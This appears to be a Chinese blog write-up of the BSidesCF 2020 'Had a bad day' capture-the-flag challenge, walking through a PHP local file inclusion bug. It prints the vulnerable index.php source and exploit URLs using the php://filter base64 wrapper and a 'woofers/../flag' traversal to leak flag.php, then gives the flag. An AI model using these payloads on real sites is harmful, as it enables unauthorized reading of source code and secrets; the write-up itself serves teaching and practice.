[BSidesCF 2020]Had a bad day1

题目

这里有传参

文件包含使用伪协议读取flag

先读取index.php查看

复制代码
/index.php?category=php://filter/read=convert.base64-encode/resource=index

解码

index.php源码

php 复制代码
              <?php
				$file = $_GET['category'];

				if(isset($file))
				{
					if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){
						include ($file . '.php');
					}
					else{
						echo "Sorry, we currently only support woofers and meowers.";
					}
				}
				?>

传入的category需要有woofers,meowers,index才能包含传入以传入名为文件名的文件,我们要想办法包含flag.php

尝试直接读取/index.php?category=woofers/../flag

php 复制代码
/index.php?category=php://filter/read=convert.base64-encode/resource=woofers/../flag

解码

拿下flag

flag{85254eba-a050-49cd-a3be-4e9859e51241}

相关推荐
CrystalShaw2 小时前
[AI codec]opus-1.6\DRED 编码侧 学习笔记
笔记·学习
张张123y2 小时前
RAG从0到1学习:技术架构、项目实践与面试指南
人工智能·python·学习·面试·架构·langchain·transformer
·醉挽清风·3 小时前
学习笔记—Linux—文件IO
linux·服务器·学习
Accerlator3 小时前
计算机网络学习
学习·计算机网络
星爷AG I3 小时前
14-12 动作序列学习(AGI基础理论)
人工智能·学习·agi
澄澈青空~3 小时前
Unity3D VR 游戏开发 — 技术路线与学习路线完整大纲
学习·vr
想搞艺术的程序员6 小时前
Java Survivor区学习笔记
java·笔记·学习·垃圾回收
吃杠碰小鸡6 小时前
学习英语的思路性问题
学习
-Springer-6 小时前
STM32 学习 —— 个人学习笔记9-2(USART串口数据包 & 串口收发 HEX 及 文本 数据包)
笔记·stm32·学习
会编程的李较瘦6 小时前
【C语言程序设计学习】一、C语法基础
c语言·开发语言·学习